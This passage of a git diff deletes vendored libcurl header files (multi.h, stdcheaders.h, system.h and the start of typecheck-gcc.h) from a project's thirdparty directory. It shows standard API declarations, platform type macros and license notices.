-#define CURL_POLL_OUT    2
-#define CURL_POLL_INOUT  3
-#define CURL_POLL_REMOVE 4
-
-#define CURL_SOCKET_TIMEOUT CURL_SOCKET_BAD
-
-#define CURL_CSELECT_IN   0x01
-#define CURL_CSELECT_OUT  0x02
-#define CURL_CSELECT_ERR  0x04
-
-typedef int (*curl_socket_callback)(CURL *easy,      /* easy handle */
-                                    curl_socket_t s, /* socket */
-                                    int what,        /* see above */
-                                    void *userp,     /* private callback
-                                                        pointer */
-                                    void *socketp);  /* private socket
-                                                        pointer */
-/*
- * Name:    curl_multi_timer_callback
- *
- * Desc:    Called by libcurl whenever the library detects a change in the
- *          maximum number of milliseconds the app is allowed to wait before
- *          curl_multi_socket() or curl_multi_perform() must be called
- *          (to allow libcurl's timed events to take place).
- *
- * Returns: The callback should return zero.
- */
-typedef int (*curl_multi_timer_callback)(CURLM *multi,    /* multi handle */
-                                         long timeout_ms, /* see above */
-                                         void *userp);    /* private callback
-                                                             pointer */
-
-CURL_EXTERN CURLMcode curl_multi_socket(CURLM *multi_handle, curl_socket_t s,
-                                        int *running_handles);
-
-CURL_EXTERN CURLMcode curl_multi_socket_action(CURLM *multi_handle,
-                                               curl_socket_t s,
-                                               int ev_bitmask,
-                                               int *running_handles);
-
-CURL_EXTERN CURLMcode curl_multi_socket_all(CURLM *multi_handle,
-                                            int *running_handles);
-
-#ifndef CURL_ALLOW_OLD_MULTI_SOCKET
-/* This macro below was added in 7.16.3 to push users who recompile to use
-   the new curl_multi_socket_action() instead of the old curl_multi_socket()
-*/
-#define curl_multi_socket(x,y,z) curl_multi_socket_action(x,y,0,z)
-#endif
-
-/*
- * Name:    curl_multi_timeout()
- *
- * Desc:    Returns the maximum number of milliseconds the app is allowed to
- *          wait before curl_multi_socket() or curl_multi_perform() must be
- *          called (to allow libcurl's timed events to take place).
- *
- * Returns: CURLM error code.
- */
-CURL_EXTERN CURLMcode curl_multi_timeout(CURLM *multi_handle,
-                                         long *milliseconds);
-
-#undef CINIT /* re-using the same name as in curl.h */
-
-#ifdef CURL_ISOCPP
-#define CINIT(name,type,num) CURLMOPT_ ## name = CURLOPTTYPE_ ## type + num
-#else
-/* The macro "##" is ISO C, we assume pre-ISO C doesn't support it. */
-#define LONG          CURLOPTTYPE_LONG
-#define OBJECTPOINT   CURLOPTTYPE_OBJECTPOINT
-#define FUNCTIONPOINT CURLOPTTYPE_FUNCTIONPOINT
-#define OFF_T         CURLOPTTYPE_OFF_T
-#define CINIT(name,type,number) CURLMOPT_/**/name = type + number
-#endif
-
-typedef enum {
-  /* This is the socket callback function pointer */
-  CINIT(SOCKETFUNCTION, FUNCTIONPOINT, 1),
-
-  /* This is the argument passed to the socket callback */
-  CINIT(SOCKETDATA, OBJECTPOINT, 2),
-
-    /* set to 1 to enable pipelining for this multi handle */
-  CINIT(PIPELINING, LONG, 3),
-
-   /* This is the timer callback function pointer */
-  CINIT(TIMERFUNCTION, FUNCTIONPOINT, 4),
-
-  /* This is the argument passed to the timer callback */
-  CINIT(TIMERDATA, OBJECTPOINT, 5),
-
-  /* maximum number of entries in the connection cache */
-  CINIT(MAXCONNECTS, LONG, 6),
-
-  /* maximum number of (pipelining) connections to one host */
-  CINIT(MAX_HOST_CONNECTIONS, LONG, 7),
-
-  /* maximum number of requests in a pipeline */
-  CINIT(MAX_PIPELINE_LENGTH, LONG, 8),
-
-  /* a connection with a content-length longer than this
-     will not be considered for pipelining */
-  CINIT(CONTENT_LENGTH_PENALTY_SIZE, OFF_T, 9),
-
-  /* a connection with a chunk length longer than this
-     will not be considered for pipelining */
-  CINIT(CHUNK_LENGTH_PENALTY_SIZE, OFF_T, 10),
-
-  /* a list of site names(+port) that are blacklisted from
-     pipelining */
-  CINIT(PIPELINING_SITE_BL, OBJECTPOINT, 11),
-
-  /* a list of server types that are blacklisted from
-     pipelining */
-  CINIT(PIPELINING_SERVER_BL, OBJECTPOINT, 12),
-
-  /* maximum number of open connections in total */
-  CINIT(MAX_TOTAL_CONNECTIONS, LONG, 13),
-
-   /* This is the server push callback function pointer */
-  CINIT(PUSHFUNCTION, FUNCTIONPOINT, 14),
-
-  /* This is the argument passed to the server push callback */
-  CINIT(PUSHDATA, OBJECTPOINT, 15),
-
-  CURLMOPT_LASTENTRY /* the last unused */
-} CURLMoption;
-
-
-/*
- * Name:    curl_multi_setopt()
- *
- * Desc:    Sets options for the multi handle.
- *
- * Returns: CURLM error code.
- */
-CURL_EXTERN CURLMcode curl_multi_setopt(CURLM *multi_handle,
-                                        CURLMoption option, ...);
-
-
-/*
- * Name:    curl_multi_assign()
- *
- * Desc:    This function sets an association in the multi handle between the
- *          given socket and a private pointer of the application. This is
- *          (only) useful for curl_multi_socket uses.
- *
- * Returns: CURLM error code.
- */
-CURL_EXTERN CURLMcode curl_multi_assign(CURLM *multi_handle,
-                                        curl_socket_t sockfd, void *sockp);
-
-
-/*
- * Name: curl_push_callback
- *
- * Desc: This callback gets called when a new stream is being pushed by the
- *       server. It approves or denies the new stream.
- *
- * Returns: CURL_PUSH_OK or CURL_PUSH_DENY.
- */
-#define CURL_PUSH_OK   0
-#define CURL_PUSH_DENY 1
-
-struct curl_pushheaders;  /* forward declaration only */
-
-CURL_EXTERN char *curl_pushheader_bynum(struct curl_pushheaders *h,
-                                        size_t num);
-CURL_EXTERN char *curl_pushheader_byname(struct curl_pushheaders *h,
-                                         const char *name);
-
-typedef int (*curl_push_callback)(CURL *parent,
-                                  CURL *easy,
-                                  size_t num_headers,
-                                  struct curl_pushheaders *headers,
-                                  void *userp);
-
-#ifdef __cplusplus
-} /* end of extern "C" */
-#endif
-
-#endif
diff --git a/thirdparty/curl/include/curl/stdcheaders.h b/thirdparty/curl/include/curl/stdcheaders.h
deleted file mode 100644
index 027b6f4..0000000
--- a/thirdparty/curl/include/curl/stdcheaders.h
+++ /dev/null
@@ -1,33 +0,0 @@
-#ifndef __STDC_HEADERS_H
-#define __STDC_HEADERS_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2016, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-#include <sys/types.h>
-
-size_t fread(void *, size_t, size_t, FILE *);
-size_t fwrite(const void *, size_t, size_t, FILE *);
-
-int strcasecmp(const char *, const char *);
-int strncasecmp(const char *, const char *, size_t);
-
-#endif /* __STDC_HEADERS_H */
diff --git a/thirdparty/curl/include/curl/system.h b/thirdparty/curl/include/curl/system.h
deleted file mode 100644
index 07bbd9c..0000000
--- a/thirdparty/curl/include/curl/system.h
+++ /dev/null
@@ -1,473 +0,0 @@
-#ifndef __CURL_SYSTEM_H
-#define __CURL_SYSTEM_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-/*
- * Try to keep one section per platform, compiler and architecture, otherwise,
- * if an existing section is reused for a different one and later on the
- * original is adjusted, probably the piggybacking one can be adversely
- * changed.
- *
- * In order to differentiate between platforms/compilers/architectures use
- * only compiler built in predefined preprocessor symbols.
- *
- * curl_off_t
- * ----------
- *
- * For any given platform/compiler curl_off_t must be typedef'ed to a 64-bit
- * wide signed integral data type. The width of this data type must remain
- * constant and independent of any possible large file support settings.
- *
- * As an exception to the above, curl_off_t shall be typedef'ed to a 32-bit
- * wide signed integral data type if there is no 64-bit type.
- *
- * As a general rule, curl_off_t shall not be mapped to off_t. This rule shall
- * only be violated if off_t is the only 64-bit data type available and the
- * size of off_t is independent of large file support settings. Keep your
- * build on the safe side avoiding an off_t gating.  If you have a 64-bit
- * off_t then take for sure that another 64-bit data type exists, dig deeper
- * and you will find it.
- *
- */
-
-#if defined(__DJGPP__) || defined(__GO32__)
-#  if defined(__DJGPP__) && (__DJGPP__ > 1)
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__SALFORDC__)
-#  define CURL_TYPEOF_CURL_OFF_T     long
-#  define CURL_FORMAT_CURL_OFF_T     "ld"
-#  define CURL_FORMAT_CURL_OFF_TU    "lu"
-#  define CURL_SUFFIX_CURL_OFF_T     L
-#  define CURL_SUFFIX_CURL_OFF_TU    UL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__BORLANDC__)
-#  if (__BORLANDC__ < 0x520)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "I64d"
-#    define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#    define CURL_SUFFIX_CURL_OFF_T     i64
-#    define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__TURBOC__)
-#  define CURL_TYPEOF_CURL_OFF_T     long
-#  define CURL_FORMAT_CURL_OFF_T     "ld"
-#  define CURL_FORMAT_CURL_OFF_TU    "lu"
-#  define CURL_SUFFIX_CURL_OFF_T     L
-#  define CURL_SUFFIX_CURL_OFF_TU    UL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__WATCOMC__)
-#  if defined(__386__)
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "I64d"
-#    define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#    define CURL_SUFFIX_CURL_OFF_T     i64
-#    define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__POCC__)
-#  if (__POCC__ < 280)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  elif defined(_MSC_VER)
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "I64d"
-#    define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#    define CURL_SUFFIX_CURL_OFF_T     i64
-#    define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__LCC__)
-#  define CURL_TYPEOF_CURL_OFF_T     long
-#  define CURL_FORMAT_CURL_OFF_T     "ld"
-#  define CURL_FORMAT_CURL_OFF_TU    "lu"
-#  define CURL_SUFFIX_CURL_OFF_T     L
-#  define CURL_SUFFIX_CURL_OFF_TU    UL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__SYMBIAN32__)
-#  if defined(__EABI__)  /* Treat all ARM compilers equally */
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  elif defined(__CW32__)
-#    pragma longlong on
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  elif defined(__VC32__)
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T unsigned int
-
-#elif defined(__MWERKS__)
-#  define CURL_TYPEOF_CURL_OFF_T     long long
-#  define CURL_FORMAT_CURL_OFF_T     "lld"
-#  define CURL_FORMAT_CURL_OFF_TU    "llu"
-#  define CURL_SUFFIX_CURL_OFF_T     LL
-#  define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(_WIN32_WCE)
-#  define CURL_TYPEOF_CURL_OFF_T     __int64
-#  define CURL_FORMAT_CURL_OFF_T     "I64d"
-#  define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#  define CURL_SUFFIX_CURL_OFF_T     i64
-#  define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__MINGW32__)
-#  define CURL_TYPEOF_CURL_OFF_T     long long
-#  define CURL_FORMAT_CURL_OFF_T     "I64d"
-#  define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#  define CURL_SUFFIX_CURL_OFF_T     LL
-#  define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#  define CURL_PULL_SYS_TYPES_H      1
-#  define CURL_PULL_WS2TCPIP_H       1
-
-#elif defined(__VMS)
-#  if defined(__VAX)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T unsigned int
-
-#elif defined(__OS400__)
-#  if defined(__ILEC400__)
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#    define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#    define CURL_PULL_SYS_TYPES_H      1
-#    define CURL_PULL_SYS_SOCKET_H     1
-#  endif
-
-#elif defined(__MVS__)
-#  if defined(__IBMC__) || defined(__IBMCPP__)
-#    if defined(_ILP32)
-#    elif defined(_LP64)
-#    endif
-#    if defined(_LONG_LONG)
-#      define CURL_TYPEOF_CURL_OFF_T     long long
-#      define CURL_FORMAT_CURL_OFF_T     "lld"
-#      define CURL_FORMAT_CURL_OFF_TU    "llu"
-#      define CURL_SUFFIX_CURL_OFF_T     LL
-#      define CURL_SUFFIX_CURL_OFF_TU    ULL
-#    elif defined(_LP64)
-#      define CURL_TYPEOF_CURL_OFF_T     long
-#      define CURL_FORMAT_CURL_OFF_T     "ld"
-#      define CURL_FORMAT_CURL_OFF_TU    "lu"
-#      define CURL_SUFFIX_CURL_OFF_T     L
-#      define CURL_SUFFIX_CURL_OFF_TU    UL
-#    else
-#      define CURL_TYPEOF_CURL_OFF_T     long
-#      define CURL_FORMAT_CURL_OFF_T     "ld"
-#      define CURL_FORMAT_CURL_OFF_TU    "lu"
-#      define CURL_SUFFIX_CURL_OFF_T     L
-#      define CURL_SUFFIX_CURL_OFF_TU    UL
-#    endif
-#    define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#    define CURL_PULL_SYS_TYPES_H      1
-#    define CURL_PULL_SYS_SOCKET_H     1
-#  endif
-
-#elif defined(__370__)
-#  if defined(__IBMC__) || defined(__IBMCPP__)
-#    if defined(_ILP32)
-#    elif defined(_LP64)
-#    endif
-#    if defined(_LONG_LONG)
-#      define CURL_TYPEOF_CURL_OFF_T     long long
-#      define CURL_FORMAT_CURL_OFF_T     "lld"
-#      define CURL_FORMAT_CURL_OFF_TU    "llu"
-#      define CURL_SUFFIX_CURL_OFF_T     LL
-#      define CURL_SUFFIX_CURL_OFF_TU    ULL
-#    elif defined(_LP64)
-#      define CURL_TYPEOF_CURL_OFF_T     long
-#      define CURL_FORMAT_CURL_OFF_T     "ld"
-#      define CURL_FORMAT_CURL_OFF_TU    "lu"
-#      define CURL_SUFFIX_CURL_OFF_T     L
-#      define CURL_SUFFIX_CURL_OFF_TU    UL
-#    else
-#      define CURL_TYPEOF_CURL_OFF_T     long
-#      define CURL_FORMAT_CURL_OFF_T     "ld"
-#      define CURL_FORMAT_CURL_OFF_TU    "lu"
-#      define CURL_SUFFIX_CURL_OFF_T     L
-#      define CURL_SUFFIX_CURL_OFF_TU    UL
-#    endif
-#    define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#    define CURL_PULL_SYS_TYPES_H      1
-#    define CURL_PULL_SYS_SOCKET_H     1
-#  endif
-
-#elif defined(TPF)
-#  define CURL_TYPEOF_CURL_OFF_T     long
-#  define CURL_FORMAT_CURL_OFF_T     "ld"
-#  define CURL_FORMAT_CURL_OFF_TU    "lu"
-#  define CURL_SUFFIX_CURL_OFF_T     L
-#  define CURL_SUFFIX_CURL_OFF_TU    UL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-#elif defined(__TINYC__) /* also known as tcc */
-
-#  define CURL_TYPEOF_CURL_OFF_T     long long
-#  define CURL_FORMAT_CURL_OFF_T     "lld"
-#  define CURL_FORMAT_CURL_OFF_TU    "llu"
-#  define CURL_SUFFIX_CURL_OFF_T     LL
-#  define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#  define CURL_PULL_SYS_TYPES_H      1
-#  define CURL_PULL_SYS_SOCKET_H     1
-
-#elif defined(__SUNPRO_C) /* Oracle Solaris Studio */
-#  if !defined(__LP64) && (defined(__ILP32) ||                          \
-                           defined(__i386) || defined(__sparcv8))
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  elif defined(__LP64) || \
-        defined(__amd64) || defined(__sparcv9)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#  define CURL_PULL_SYS_TYPES_H      1
-#  define CURL_PULL_SYS_SOCKET_H     1
-
-/* ===================================== */
-/*    KEEP MSVC THE PENULTIMATE ENTRY    */
-/* ===================================== */
-
-#elif defined(_MSC_VER)
-#  if (_MSC_VER >= 900) && (_INTEGRAL_MAX_BITS >= 64)
-#    define CURL_TYPEOF_CURL_OFF_T     __int64
-#    define CURL_FORMAT_CURL_OFF_T     "I64d"
-#    define CURL_FORMAT_CURL_OFF_TU    "I64u"
-#    define CURL_SUFFIX_CURL_OFF_T     i64
-#    define CURL_SUFFIX_CURL_OFF_TU    ui64
-#  else
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T int
-
-/* ===================================== */
-/*    KEEP GENERIC GCC THE LAST ENTRY    */
-/* ===================================== */
-
-#elif defined(__GNUC__)
-#  if !defined(__LP64__) &&                                             \
-  (defined(__ILP32__) || defined(__i386__) || defined(__hppa__) ||      \
-   defined(__ppc__) || defined(__powerpc__) || defined(__arm__) ||      \
-   defined(__sparc__) || defined(__mips__) || defined(__sh__) ||        \
-   defined(__XTENSA__) ||                                               \
-   (defined(__SIZEOF_LONG__) && __SIZEOF_LONG__ == 4)  ||               \
-   (defined(__LONG_MAX__) && __LONG_MAX__ == 2147483647L))
-#    define CURL_TYPEOF_CURL_OFF_T     long long
-#    define CURL_FORMAT_CURL_OFF_T     "lld"
-#    define CURL_FORMAT_CURL_OFF_TU    "llu"
-#    define CURL_SUFFIX_CURL_OFF_T     LL
-#    define CURL_SUFFIX_CURL_OFF_TU    ULL
-#  elif defined(__LP64__) || \
-        defined(__x86_64__) || defined(__ppc64__) || defined(__sparc64__) || \
-        (defined(__SIZEOF_LONG__) && __SIZEOF_LONG__ == 8) || \
-        (defined(__LONG_MAX__) && __LONG_MAX__ == 9223372036854775807L)
-#    define CURL_TYPEOF_CURL_OFF_T     long
-#    define CURL_FORMAT_CURL_OFF_T     "ld"
-#    define CURL_FORMAT_CURL_OFF_TU    "lu"
-#    define CURL_SUFFIX_CURL_OFF_T     L
-#    define CURL_SUFFIX_CURL_OFF_TU    UL
-#  endif
-#  define CURL_TYPEOF_CURL_SOCKLEN_T socklen_t
-#  define CURL_PULL_SYS_TYPES_H      1
-#  define CURL_PULL_SYS_SOCKET_H     1
-
-#else
-/* generic "safe guess" on old 32 bit style */
-# define CURL_TYPEOF_CURL_OFF_T     long
-# define CURL_FORMAT_CURL_OFF_T     "ld"
-# define CURL_FORMAT_CURL_OFF_TU    "lu"
-# define CURL_SUFFIX_CURL_OFF_T     L
-# define CURL_SUFFIX_CURL_OFF_TU    UL
-# define CURL_TYPEOF_CURL_SOCKLEN_T int
-#endif
-
-#ifdef _AIX
-/* AIX needs <sys/poll.h> */
-#define CURL_PULL_SYS_POLL_H
-#endif
-
-
-/* CURL_PULL_WS2TCPIP_H is defined above when inclusion of header file  */
-/* ws2tcpip.h is required here to properly make type definitions below. */
-#ifdef CURL_PULL_WS2TCPIP_H
-#  include <winsock2.h>
-#  include <windows.h>
-#  include <ws2tcpip.h>
-#endif
-
-/* CURL_PULL_SYS_TYPES_H is defined above when inclusion of header file  */
-/* sys/types.h is required here to properly make type definitions below. */
-#ifdef CURL_PULL_SYS_TYPES_H
-#  include <sys/types.h>
-#endif
-
-/* CURL_PULL_SYS_SOCKET_H is defined above when inclusion of header file  */
-/* sys/socket.h is required here to properly make type definitions below. */
-#ifdef CURL_PULL_SYS_SOCKET_H
-#  include <sys/socket.h>
-#endif
-
-/* CURL_PULL_SYS_POLL_H is defined above when inclusion of header file    */
-/* sys/poll.h is required here to properly make type definitions below.   */
-#ifdef CURL_PULL_SYS_POLL_H
-#  include <sys/poll.h>
-#endif
-
-/* Data type definition of curl_socklen_t. */
-#ifdef CURL_TYPEOF_CURL_SOCKLEN_T
-  typedef CURL_TYPEOF_CURL_SOCKLEN_T curl_socklen_t;
-#endif
-
-/* Data type definition of curl_off_t. */
-
-#ifdef CURL_TYPEOF_CURL_OFF_T
-  typedef CURL_TYPEOF_CURL_OFF_T curl_off_t;
-#endif
-
-/*
- * CURL_ISOCPP and CURL_OFF_T_C definitions are done here in order to allow
- * these to be visible and exported by the external libcurl interface API,
- * while also making them visible to the library internals, simply including
- * curl_setup.h, without actually needing to include curl.h internally.
- * If some day this section would grow big enough, all this should be moved
- * to its own header file.
- */
-
-/*
- * Figure out if we can use the ## preprocessor operator, which is supported
- * by ISO/ANSI C and C++. Some compilers support it without setting __STDC__
- * or  __cplusplus so we need to carefully check for them too.
- */
-
-#if defined(__STDC__) || defined(_MSC_VER) || defined(__cplusplus) || \
-  defined(__HP_aCC) || defined(__BORLANDC__) || defined(__LCC__) || \
-  defined(__POCC__) || defined(__SALFORDC__) || defined(__HIGHC__) || \
-  defined(__ILEC400__)
-  /* This compiler is believed to have an ISO compatible preprocessor */
-#define CURL_ISOCPP
-#else
-  /* This compiler is believed NOT to have an ISO compatible preprocessor */
-#undef CURL_ISOCPP
-#endif
-
-/*
- * Macros for minimum-width signed and unsigned curl_off_t integer constants.
- */
-
-#if defined(__BORLANDC__) && (__BORLANDC__ == 0x0551)
-#  define __CURL_OFF_T_C_HLPR2(x) x
-#  define __CURL_OFF_T_C_HLPR1(x) __CURL_OFF_T_C_HLPR2(x)
-#  define CURL_OFF_T_C(Val)  __CURL_OFF_T_C_HLPR1(Val) ## \
-                             __CURL_OFF_T_C_HLPR1(CURL_SUFFIX_CURL_OFF_T)
-#  define CURL_OFF_TU_C(Val) __CURL_OFF_T_C_HLPR1(Val) ## \
-                             __CURL_OFF_T_C_HLPR1(CURL_SUFFIX_CURL_OFF_TU)
-#else
-#  ifdef CURL_ISOCPP
-#    define __CURL_OFF_T_C_HLPR2(Val,Suffix) Val ## Suffix
-#  else
-#    define __CURL_OFF_T_C_HLPR2(Val,Suffix) Val/**/Suffix
-#  endif
-#  define __CURL_OFF_T_C_HLPR1(Val,Suffix) __CURL_OFF_T_C_HLPR2(Val,Suffix)
-#  define CURL_OFF_T_C(Val)  __CURL_OFF_T_C_HLPR1(Val,CURL_SUFFIX_CURL_OFF_T)
-#  define CURL_OFF_TU_C(Val) __CURL_OFF_T_C_HLPR1(Val,CURL_SUFFIX_CURL_OFF_TU)
-#endif
-
-#endif /* __CURL_SYSTEM_H */
diff --git a/thirdparty/curl/include/curl/typecheck-gcc.h b/thirdparty/curl/include/curl/typecheck-gcc.h
deleted file mode 100644
index 3a0f253..0000000
--- a/thirdparty/curl/include/curl/typecheck-gcc.h
+++ /dev/null
@@ -1,696 +0,0 @@
-#ifndef __CURL_TYPECHECK_GCC_H
-#define __CURL_TYPECHECK_GCC_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-/* wraps curl_easy_setopt() with typechecking */
-
-/* To add a new kind of warning, add an
- *   if(_curl_is_sometype_option(_curl_opt))
- *     if(!_curl_is_sometype(value))
- *       _curl_easy_setopt_err_sometype();
- * block and define _curl_is_sometype_option, _curl_is_sometype and
- * _curl_easy_setopt_err_sometype below
- *
- * NOTE: We use two nested 'if' statements here instead of the && operator, in
- *       order to work around gcc bug #32061.  It affects only gcc 4.3.x/4.4.x
- *       when compiling with -Wlogical-op.
- *
- * To add an option that uses the same type as an existing option, you'll just
- * need to extend the appropriate _curl_*_option macro
- */
-#define curl_easy_setopt(handle, option, value)                               \
-__extension__ ({                                                              \
-  __typeof__(option) _curl_opt = option;                                     \
-  if(__builtin_constant_p(_curl_opt)) {                                       \
-    if(_curl_is_long_option(_curl_opt))                                       \
-      if(!_curl_is_long(value))                                               \
-        _curl_easy_setopt_err_long();                                         \
-    if(_curl_is_off_t_option(_curl_opt))                                      \
